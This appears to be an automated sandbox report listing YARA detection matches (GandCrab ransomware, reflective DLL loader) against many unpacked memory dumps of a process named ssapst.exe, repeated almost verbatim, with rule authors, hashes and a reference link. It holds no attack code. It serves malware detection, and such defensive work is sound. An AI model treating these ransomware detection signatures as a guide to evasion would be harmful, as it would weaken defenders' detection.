Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
